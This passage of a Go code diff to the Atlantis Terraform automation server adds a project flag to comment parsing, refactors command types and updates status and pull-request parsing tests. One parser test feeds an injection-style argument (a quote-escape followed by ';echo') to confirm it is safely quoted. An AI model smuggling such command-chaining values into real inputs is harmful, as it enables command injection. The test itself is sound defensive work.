+ ch.AllowForkPRs = false // by default it's false so don't need to reset
+ var pull github.PullRequest
+ modelPull := models.PullRequest{State: models.Open}
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+
+ headRepo := fixtures.GithubRepo
+ headRepo.FullName = "forkrepo/atlantis"
+ headRepo.Owner = "forkrepo"
+ When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, modelPull.BaseRepo, headRepo, nil)
+
+ ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil)
+ vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
+}
+
+func TestRunCommentCommand_ClosedPull(t *testing.T) {
+ t.Log("if a command is run on a closed pull request atlantis should" +
+ " comment saying that this is not allowed")
+ setup(t)
+ pull := &github.PullRequest{
+ State: github.String("closed"),
+ }
+ modelPull := models.PullRequest{State: models.Closed}
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+ When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, modelPull.BaseRepo, fixtures.GithubRepo, nil)
+
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+ vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
+}
+
+func TestRunCommentCommand_FullRun(t *testing.T) {
+ pull := &github.PullRequest{
+ State: github.String("closed"),
+ }
+ expCmdResult := events.CommandResult{
+ ProjectResults: []events.ProjectResult{
+ {
+ RepoRelDir: ".",
+ Workspace: "default",
+ },
+ },
+ }
+ for _, c := range []events.CommandName{events.Plan, events.Apply} {
+ setup(t)
+ cmd := events.NewCommentCommand(".", nil, c, false, "default", "")
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+ When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GithubRepo, nil)
+
+ cmdCtx := models.ProjectCommandContext{RepoRelDir: "."}
+ switch c {
+ case events.Plan:
+ When(projectCommandBuilder.BuildPlanCommand(matchers.AnyPtrToEventsCommandContext(), matchers.AnyPtrToEventsCommentCommand())).ThenReturn(cmdCtx, nil)
+ case events.Apply:
+ When(projectCommandBuilder.BuildApplyCommand(matchers.AnyPtrToEventsCommandContext(), matchers.AnyPtrToEventsCommentCommand())).ThenReturn(cmdCtx, nil)
+ }
+
+ ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, cmd)
+
+ ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, c)
+ _, _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+ Equals(t, expCmdResult, response)
+ vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+ }
+}
+
+func TestRunAutoplanCommands(t *testing.T) {
+ expCmdResult := events.CommandResult{
+ ProjectResults: []events.ProjectResult{
+ {
+ RepoRelDir: ".",
+ Workspace: "default",
+ },
+ },
+ }
+ setup(t)
+ When(projectCommandBuilder.BuildAutoplanCommands(matchers.AnyPtrToEventsCommandContext())).ThenReturn([]models.ProjectCommandContext{{RepoRelDir: ".", Workspace: "default"}}, nil)
+ ch.RunAutoplanCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.Pull, fixtures.User)
+
+ ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)
+ _, _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+ Equals(t, expCmdResult, response)
+ vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+}
diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go
index d0e921d79e..46e30708ce 100644
--- a/server/events/comment_parser.go
+++ b/server/events/comment_parser.go
@@ -21,6 +21,7 @@ import (
"strings"
"github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/yaml"
"github.com/spf13/pflag"
)
@@ -29,8 +30,12 @@ const (
WorkspaceFlagShort = "w"
DirFlagLong = "dir"
DirFlagShort = "d"
+ ProjectFlagLong = "project"
+ ProjectFlagShort = "p"
VerboseFlagLong = "verbose"
VerboseFlagShort = ""
+ DefaultWorkspace = "default"
+ DefaultDir = "."
)
//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_comment_parsing.go CommentParsing
@@ -54,7 +59,7 @@ type CommentParser struct {
type CommentParseResult struct {
// Command is the successfully parsed command. Will be nil if
// CommentResponse or Ignore is set.
- Command *Command
+ Command *CommentCommand
// CommentResponse is set when we should respond immediately to the command
// for example for atlantis help.
CommentResponse string
@@ -129,27 +134,29 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
var workspace string
var dir string
+ var project string
var verbose bool
var extraArgs []string
var flagSet *pflag.FlagSet
var name CommandName
// Set up the flag parsing depending on the command.
- const defaultWorkspace = "default"
switch command {
case Plan.String():
name = Plan
flagSet = pflag.NewFlagSet(Plan.String(), pflag.ContinueOnError)
flagSet.SetOutput(ioutil.Discard)
- flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Switch to this Terraform workspace before planning.")
- flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Which directory to run plan in relative to root of repo. Use '.' for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.")
+ flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.")
+ flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.")
+ flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Which project to run plan for. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename))
flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
case Apply.String():
name = Apply
flagSet = pflag.NewFlagSet(Apply.String(), pflag.ContinueOnError)
flagSet.SetOutput(ioutil.Discard)
- flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Apply the plan for this Terraform workspace.")
- flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Apply the plan for this directory, relative to root of repo. Use '.' for root. If not specified, will run apply against all plans created for this workspace.")
+ flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.")
+ flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 'child/dir'.")
+ flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Apply the plan for this project. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename))
flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
default:
return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)}
@@ -197,8 +204,18 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
return CommentParseResult{CommentResponse: e.errMarkdown(fmt.Sprintf("invalid workspace: %q", workspace), command, flagSet)}
}
+ // If project is specified, dir or workspace should not be set. Since
+ // dir/workspace have defaults, we can't tell whether the user set a flag
+ // to its default or didn't set it at all, so there's an edge case we
+ // don't detect: ex. atlantis plan -p project -d . -w default won't cause
+ // an error.
+ if project != "" && (workspace != DefaultWorkspace || dir != DefaultDir) {
+ err := fmt.Sprintf("cannot use -%s/--%s at same time as -%s/--%s or -%s/--%s", ProjectFlagShort, ProjectFlagLong, DirFlagShort, DirFlagLong, WorkspaceFlagShort, WorkspaceFlagLong)
+ return CommentParseResult{CommentResponse: e.errMarkdown(err, command, flagSet)}
+ }
+
return CommentParseResult{
- Command: &Command{Name: name, Verbose: verbose, Workspace: workspace, Dir: dir, Flags: extraArgs},
+ Command: NewCommentCommand(dir, extraArgs, name, verbose, workspace, project),
}
}
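
The effect of the new validation, sketched against the parser (the comment strings mirror the test cases added below, and the exact error wording comes from errMarkdown):

    r := commentParser.Parse("atlantis plan -p project", models.Github)
    // Accepted: project is set; dir and workspace keep their "." and
    // "default" defaults.

    r = commentParser.Parse("atlantis plan -p project -d dir", models.Github)
    // Rejected: r.CommentResponse explains that -p/--project can't be used at
    // the same time as -d/--dir or -w/--workspace.
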
diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go
index 87b14f358b..de127c7b8f 100644
--- a/server/events/comment_parser_test.go
+++ b/server/events/comment_parser_test.go
@@ -31,8 +31,6 @@ var commentParser = events.CommentParser{
}
func TestParse_Ignored(t *testing.T) {
- t.Log("given a comment that should be ignored we should set " +
- "CommentParseResult.Ignore to true")
ignoreComments := []string{
"",
"a",
@@ -47,8 +45,6 @@ func TestParse_Ignored(t *testing.T) {
}
func TestParse_HelpResponse(t *testing.T) {
- t.Log("given a comment that should result in help output we " +
- "should set CommentParseResult.CommentResult")
helpComments := []string{
"run",
"atlantis",
@@ -259,6 +255,22 @@ func TestParse_InvalidWorkspace(t *testing.T) {
}
}
+func TestParse_UsingProjectAtSameTimeAsWorkspaceOrDir(t *testing.T) {
+ cases := []string{
+ "atlantis plan -w workspace -p project",
+ "atlantis plan -d dir -p project",
+ "atlantis plan -d dir -w workspace -p project",
+ }
+ for _, c := range cases {
+ t.Run(c, func(t *testing.T) {
+ r := commentParser.Parse(c, models.Github)
+ exp := "Error: cannot use -p/--project at same time as -d/--dir or -w/--workspace"
+ Assert(t, strings.Contains(r.CommentResponse, exp),
+ "For comment %q expected CommentResponse %q to contain %q", c, r.CommentResponse, exp)
+ })
+ }
+}
+
func TestParse_Parsing(t *testing.T) {
cases := []struct {
flags string
@@ -266,22 +278,25 @@ func TestParse_Parsing(t *testing.T) {
expDir string
expVerbose bool
expExtraArgs string
+ expProject string
}{
// Test defaults.
{
"",
"default",
- "",
+ ".",
false,
"",
+ "",
},
- // Test each flag individually.
+ // Test each short flag individually.
{
"-w workspace",
"workspace",
- "",
+ ".",
false,
"",
+ "",
},
{
"-d dir",
@@ -289,13 +304,48 @@ func TestParse_Parsing(t *testing.T) {
"dir",
false,
"",
+ "",
},
{
- "--verbose",
+ "-p project",
"default",
+ ".",
+ false,
"",
+ "project",
+ },
+ {
+ "--verbose",
+ "default",
+ ".",
true,
"",
+ "",
+ },
+ // Test each long flag individually.
+ {
+ "--workspace workspace",
+ "workspace",
+ ".",
+ false,
+ "",
+ "",
+ },
+ {
+ "--dir dir",
+ "default",
+ "dir",
+ false,
+ "",
+ "",
+ },
+ {
+ "--project project",
+ "default",
+ ".",
+ false,
+ "",
+ "project",
},
// Test all of them with different permutations.
{
@@ -304,6 +354,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"",
+ "",
},
{
"-d dir -w workspace --verbose",
@@ -311,6 +362,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"",
+ "",
},
{
"--verbose -w workspace -d dir",
@@ -318,6 +370,23 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"",
+ "",
+ },
+ {
+ "-p project --verbose",
+ "default",
+ ".",
+ true,
+ "",
+ "project",
+ },
+ {
+ "--verbose -p project",
+ "default",
+ ".",
+ true,
+ "",
+ "project",
},
// Test that flags after -- are ignored
{
@@ -326,29 +395,33 @@ func TestParse_Parsing(t *testing.T) {
"dir",
false,
"\"--verbose\"",
+ "",
},
{
"-w workspace -- -d dir --verbose",
"workspace",
- "",
+ ".",
false,
"\"-d\" \"dir\" \"--verbose\"",
+ "",
},
// Test the extra args parsing.
{
"--",
"default",
- "",
+ ".",
false,
"",
+ "",
},
// Test trying to escape quoting
{
"-- \";echo \"hi",
"default",
- "",
+ ".",
false,
`"\";echo" "\"hi"`,
+ "",
},
{
"-w workspace -d dir --verbose -- arg one -two --three &&",
@@ -356,6 +429,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+ "",
},
// Test whitespace.
{
@@ -364,6 +438,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+ "",
},
{
" -w workspace -d dir --verbose -- arg one -two --three &&",
@@ -371,6 +446,7 @@ func TestParse_Parsing(t *testing.T) {
"dir",
true,
"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+ "",
},
// Test that the dir string is normalized.
{
@@ -379,6 +455,7 @@ func TestParse_Parsing(t *testing.T) {
".",
false,
"",
+ "",
},
{
"-d /adir",
@@ -386,6 +463,7 @@ func TestParse_Parsing(t *testing.T) {
"adir",
false,
"",
+ "",
},
{
"-d .",
@@ -393,6 +471,7 @@ func TestParse_Parsing(t *testing.T) {
".",
false,
"",
+ "",
},
{
"-d ./",
@@ -400,6 +479,7 @@ func TestParse_Parsing(t *testing.T) {
".",
false,
"",
+ "",
},
{
"-d ./adir",
@@ -407,6 +487,7 @@ func TestParse_Parsing(t *testing.T) {
"adir",
false,
"",
+ "",
},
}
for _, test := range cases {
@@ -414,7 +495,7 @@ func TestParse_Parsing(t *testing.T) {
comment := fmt.Sprintf("atlantis %s %s", cmdName, test.flags)
r := commentParser.Parse(comment, models.Github)
Assert(t, r.CommentResponse == "", "CommentResponse should have been empty but was %q for comment %q", r.CommentResponse, comment)
- Assert(t, test.expDir == r.Command.Dir, "exp dir to equal %q but was %q for comment %q", test.expDir, r.Command.Dir, comment)
+ Assert(t, test.expDir == r.Command.RepoRelDir, "exp dir to equal %q but was %q for comment %q", test.expDir, r.Command.RepoRelDir, comment)
Assert(t, test.expWorkspace == r.Command.Workspace, "exp workspace to equal %q but was %q for comment %q", test.expWorkspace, r.Command.Workspace, comment)
Assert(t, test.expVerbose == r.Command.Verbose, "exp verbose to equal %v but was %v for comment %q", test.expVerbose, r.Command.Verbose, comment)
actExtraArgs := strings.Join(r.Command.Flags, " ")
@@ -430,10 +511,11 @@ func TestParse_Parsing(t *testing.T) {
}
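For orientation, the table and assertions above imply a case struct roughly like the following sketch. The real definition sits earlier in this test file; the field names here are inferred from the assertions, including the new project expectation column.

type parseTestCase struct {
	flags        string // flag string appended after "atlantis plan|apply"
	expWorkspace string // expected Command.Workspace ("default" when -w is absent)
	expDir       string // expected Command.RepoRelDir ("." when -d is absent)
	expVerbose   bool   // expected Command.Verbose
	expExtraArgs string // expected quoted extra args captured after "--"
	expProject   string // expected Command.ProjectName (new -p/--project column)
}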
var PlanUsage = `Usage of plan:
- -d, --dir string Which directory to run plan in relative to root of repo.
- Use '.' for root. If not specified, will attempt to run
- plan for all Terraform projects we think were modified in
- this changeset.
+ -d, --dir string Which directory to run plan in relative to root of repo,
+ ex. 'child/dir'. (default ".")
+ -p, --project string Which project to run plan for. Refers to the name of the
+ project configured in atlantis.yaml. Cannot be used at
+ same time as workspace or dir flags.
--verbose Append Atlantis log to comment.
-w, --workspace string Switch to this Terraform workspace before planning.
(default "default")
@@ -441,8 +523,10 @@ var PlanUsage = `Usage of plan:
var ApplyUsage = `Usage of apply:
-d, --dir string Apply the plan for this directory, relative to root of
- repo. Use '.' for root. If not specified, will run apply
- against all plans created for this workspace.
+ repo, ex. 'child/dir'. (default ".")
+ -p, --project string Apply the plan for this project. Refers to the name of
+ the project configured in atlantis.yaml. Cannot be used
+ at same time as workspace or dir flags.
--verbose Append Atlantis log to comment.
-w, --workspace string Apply the plan for this Terraform workspace. (default
"default")
diff --git a/server/events/commit_status_updater.go b/server/events/commit_status_updater.go
index 3debcd43fe..ba5a235036 100644
--- a/server/events/commit_status_updater.go
+++ b/server/events/commit_status_updater.go
@@ -27,10 +27,10 @@ import (
// the status to signify whether the plan/apply succeeds.
type CommitStatusUpdater interface {
// Update updates the status of the head commit of pull.
- Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error
+ Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error
// UpdateProjectResult updates the status of the head commit given the
// state of response.
- UpdateProjectResult(ctx *CommandContext, res CommandResponse) error
+ UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error
}
// DefaultCommitStatusUpdater implements CommitStatusUpdater.
@@ -39,13 +39,13 @@ type DefaultCommitStatusUpdater struct {
}
// Update updates the commit status.
-func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error {
- description := fmt.Sprintf("%s %s", strings.Title(cmd.Name.String()), strings.Title(status.String()))
+func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error {
+ description := fmt.Sprintf("%s %s", strings.Title(command.String()), strings.Title(status.String()))
return d.Client.UpdateStatus(repo, pull, status, description)
}
// UpdateProjectResult updates the commit status based on the status of res.
-func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, res CommandResponse) error {
+func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error {
var status vcs.CommitStatus
if res.Error != nil || res.Failure != "" {
status = vcs.Failed
@@ -56,7 +56,7 @@ func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, re
}
status = d.worstStatus(statuses)
}
- return d.Update(ctx.BaseRepo, ctx.Pull, status, ctx.Command)
+ return d.Update(ctx.BaseRepo, ctx.Pull, status, commandName)
}
func (d *DefaultCommitStatusUpdater) worstStatus(ss []vcs.CommitStatus) vcs.CommitStatus {
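The body of worstStatus is not shown in this hunk; a minimal sketch of the severity folding the name implies, assuming the order Failed > Pending > Success:

// Sketch only; the real implementation may differ. Returns the most severe
// status in the slice, assuming severity order Failed > Pending > Success.
func worstStatusSketch(ss []vcs.CommitStatus) vcs.CommitStatus {
	worst := vcs.Success
	for _, s := range ss {
		switch s {
		case vcs.Failed:
			// Nothing is worse than Failed, so we can stop early.
			return vcs.Failed
		case vcs.Pending:
			worst = vcs.Pending
		}
	}
	return worst
}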
diff --git a/server/events/commit_status_updater_test.go b/server/events/commit_status_updater_test.go
index 7d05264b04..155822dc19 100644
--- a/server/events/commit_status_updater_test.go
+++ b/server/events/commit_status_updater_test.go
@@ -29,26 +29,12 @@ import (
var repoModel = models.Repo{}
var pullModel = models.PullRequest{}
var status = vcs.Success
-var cmd = events.Command{
- Name: events.Plan,
-}
-
-func TestStatus_String(t *testing.T) {
- cases := map[vcs.CommitStatus]string{
- vcs.Pending: "pending",
- vcs.Success: "success",
- vcs.Failed: "failed",
- }
- for k, v := range cases {
- Equals(t, v, k.String())
- }
-}
func TestUpdate(t *testing.T) {
RegisterMockTestingT(t)
client := mocks.NewMockClientProxy()
s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.Update(repoModel, pullModel, status, &cmd)
+ err := s.Update(repoModel, pullModel, status, events.Plan)
Ok(t, err)
client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, status, "Plan Success")
}
@@ -58,11 +44,10 @@ func TestUpdateProjectResult_Error(t *testing.T) {
ctx := &events.CommandContext{
BaseRepo: repoModel,
Pull: pullModel,
- Command: &events.Command{Name: events.Plan},
}
client := mocks.NewMockClientProxy()
s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.UpdateProjectResult(ctx, events.CommandResponse{Error: errors.New("err")})
+ err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Error: errors.New("err")})
Ok(t, err)
client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed")
}
@@ -72,23 +57,20 @@ func TestUpdateProjectResult_Failure(t *testing.T) {
ctx := &events.CommandContext{
BaseRepo: repoModel,
Pull: pullModel,
- Command: &events.Command{Name: events.Plan},
}
client := mocks.NewMockClientProxy()
s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.UpdateProjectResult(ctx, events.CommandResponse{Failure: "failure"})
+ err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Failure: "failure"})
Ok(t, err)
client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed")
}
func TestUpdateProjectResult(t *testing.T) {
- t.Log("should use worst status")
RegisterMockTestingT(t)
ctx := &events.CommandContext{
BaseRepo: repoModel,
Pull: pullModel,
- Command: &events.Command{Name: events.Plan},
}
cases := []struct {
@@ -126,25 +108,31 @@ func TestUpdateProjectResult(t *testing.T) {
}
for _, c := range cases {
- var results []events.ProjectResult
- for _, statusStr := range c.Statuses {
- var result events.ProjectResult
- switch statusStr {
- case "failure":
- result = events.ProjectResult{Failure: "failure"}
- case "error":
- result = events.ProjectResult{Error: errors.New("err")}
- default:
- result = events.ProjectResult{}
+ t.Run(strings.Join(c.Statuses, "-"), func(t *testing.T) {
+ var results []events.ProjectResult
+ for _, statusStr := range c.Statuses {
+ var result events.ProjectResult
+ switch statusStr {
+ case "failure":
+ result = events.ProjectResult{
+ ProjectCommandResult: events.ProjectCommandResult{Failure: "failure"},
+ }
+ case "error":
+ result = events.ProjectResult{
+ ProjectCommandResult: events.ProjectCommandResult{Error: errors.New("err")},
+ }
+ default:
+ result = events.ProjectResult{}
+ }
+ results = append(results, result)
}
- results = append(results, result)
- }
- resp := events.CommandResponse{ProjectResults: results}
+ resp := events.CommandResult{ProjectResults: results}
- client := mocks.NewMockClientProxy()
- s := events.DefaultCommitStatusUpdater{Client: client}
- err := s.UpdateProjectResult(ctx, resp)
- Ok(t, err)
- client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String()))
+ client := mocks.NewMockClientProxy()
+ s := events.DefaultCommitStatusUpdater{Client: client}
+ err := s.UpdateProjectResult(ctx, events.Plan, resp)
+ Ok(t, err)
+ client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String()))
+ })
}
}
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index d42e4beda0..33504cd40d 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -14,7 +14,10 @@
package events
import (
+ "fmt"
+ "path"
"regexp"
+ "strings"
"github.com/google/go-github/github"
"github.com/lkysow/go-gitlab"
@@ -31,22 +34,88 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`)
//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing
-type Command struct {
+type CommandInterface interface {
+ CommandName() CommandName
+ IsVerbose() bool
+ IsAutoplan() bool
+}
+
+type AutoplanCommand struct{}
+
+func (c AutoplanCommand) CommandName() CommandName {
+ return Plan
+}
+
+func (c AutoplanCommand) IsVerbose() bool {
+ return false
+}
+
+func (c AutoplanCommand) IsAutoplan() bool {
+ return true
+}
+
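Both AutoplanCommand and the CommentCommand defined next satisfy CommandInterface, so downstream code can branch on the trigger without knowing the concrete type. A sketch:

// Sketch: consumers that only need command metadata can accept the interface.
func describeTrigger(c CommandInterface) string {
	if c.IsAutoplan() {
		return "autoplanned " + c.CommandName().String()
	}
	return "comment-triggered " + c.CommandName().String()
}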
+type CommentCommand struct {
+ // RepoRelDir is the path relative to the repo root to run the command in.
+ // Will never be an empty string and will never end in "/".
+ RepoRelDir string
+ // Flags are the extra arguments appended to the comment,
+ // ex. atlantis plan -- -target=resource
+ Flags []string
Name CommandName
- Workspace string
Verbose bool
- Flags []string
- // Dir is the path relative to the repo root to run the command in.
- // If empty string then it wasn't specified. "." is the root of the repo.
- // Dir will never end in "/".
- Dir string
+ Workspace string
+ // ProjectName is the name of a project to run the command on. It refers to a
+ // project specified in an atlantis.yaml file.
+ ProjectName string
+}
+
+func (c CommentCommand) CommandName() CommandName {
+ return c.Name
+}
+
+func (c CommentCommand) IsVerbose() bool {
+ return c.Verbose
+}
+
+func (c CommentCommand) IsAutoplan() bool {
+ return false
+}
+
+func (c CommentCommand) String() string {
+ return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.RepoRelDir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ","))
+}
+
+// NewCommentCommand constructs a CommentCommand, setting all missing fields to defaults.
+func NewCommentCommand(repoRelDir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand {
+ // If repoRelDir was an empty string, this will return '.'.
+ validDir := path.Clean(repoRelDir)
+ if validDir == "/" {
+ validDir = "."
+ }
+ if workspace == "" {
+ workspace = DefaultWorkspace
+ }
+ return &CommentCommand{
+ RepoRelDir: validDir,
+ Flags: flags,
+ Name: name,
+ Verbose: verbose,
+ Workspace: workspace,
+ ProjectName: project,
+ }
}
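A quick usage sketch of the constructor above, showing the dir cleaning and workspace defaulting (behavior matching the tests in event_parser_test.go):

// Empty inputs fall back to defaults.
cmd := NewCommentCommand("", nil, Plan, false, "", "")
// cmd.RepoRelDir == "." and cmd.Workspace == DefaultWorkspace ("default")

// path.Clean strips trailing slashes and "./" prefixes.
cmd = NewCommentCommand("./child/dir/", []string{"-target=resource"}, Plan, true, "staging", "")
// cmd.RepoRelDir == "child/dir", cmd.Workspace == "staging"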
type EventParsing interface {
ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error)
- ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error)
+ // ParseGithubPull returns the pull request, base repo and head repo.
+ ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error)
+ // ParseGithubPullEvent returns the pull request, base repo, head repo and
+ // user that caused the event.
+ ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (pull models.PullRequest, baseRepo models.Repo, headRepo models.Repo, user models.User, err error)
ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error)
- ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error)
+ // ParseGitlabMergeEvent returns the pull request, base repo, head repo and
+ // user that caused the event.
+ ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error)
ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error)
ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest
}
@@ -79,38 +148,58 @@ func (e *EventParser) ParseGithubIssueCommentEvent(comment *github.IssueCommentE
return
}
-func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) {
- var pullModel models.PullRequest
- var headRepoModel models.Repo
+func (e *EventParser) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
+ if pullEvent.PullRequest == nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("pull_request is null")
+ }
+ pull, baseRepo, headRepo, err := e.ParseGithubPull(pullEvent.PullRequest)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
+ }
+ if pullEvent.Sender == nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender is null")
+ }
+ senderUsername := pullEvent.Sender.GetLogin()
+ if senderUsername == "" {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender.login is null")
+ }
+ return pull, baseRepo, headRepo, models.User{Username: senderUsername}, nil
+}
+func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (pullModel models.PullRequest, baseRepo models.Repo, headRepo models.Repo, err error) {
commit := pull.Head.GetSHA()
if commit == "" {
- return pullModel, headRepoModel, errors.New("head.sha is null")
+ err = errors.New("head.sha is null")
+ return
}
url := pull.GetHTMLURL()
if url == "" {
- return pullModel, headRepoModel, errors.New("html_url is null")
+ err = errors.New("html_url is null")
+ return
}
branch := pull.Head.GetRef()
if branch == "" {
- return pullModel, headRepoModel, errors.New("head.ref is null")
+ err = errors.New("head.ref is null")
+ return
}
authorUsername := pull.User.GetLogin()
if authorUsername == "" {
- return pullModel, headRepoModel, errors.New("user.login is null")
+ err = errors.New("user.login is null")
+ return
}
num := pull.GetNumber()
if num == 0 {
- return pullModel, headRepoModel, errors.New("number is null")
+ err = errors.New("number is null")
+ return
}
- baseRepoModel, err := e.ParseGithubRepo(pull.Base.Repo)
+ baseRepo, err = e.ParseGithubRepo(pull.Base.Repo)
if err != nil {
- return pullModel, headRepoModel, err
+ return
}
- headRepoModel, err = e.ParseGithubRepo(pull.Head.Repo)
+ headRepo, err = e.ParseGithubRepo(pull.Head.Repo)
if err != nil {
- return pullModel, headRepoModel, err
+ return
}
pullState := models.Closed
@@ -118,22 +207,23 @@ func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequ
pullState = models.Open
}
- return models.PullRequest{
+ pullModel = models.PullRequest{
Author: authorUsername,
Branch: branch,
HeadCommit: commit,
URL: url,
Num: num,
State: pullState,
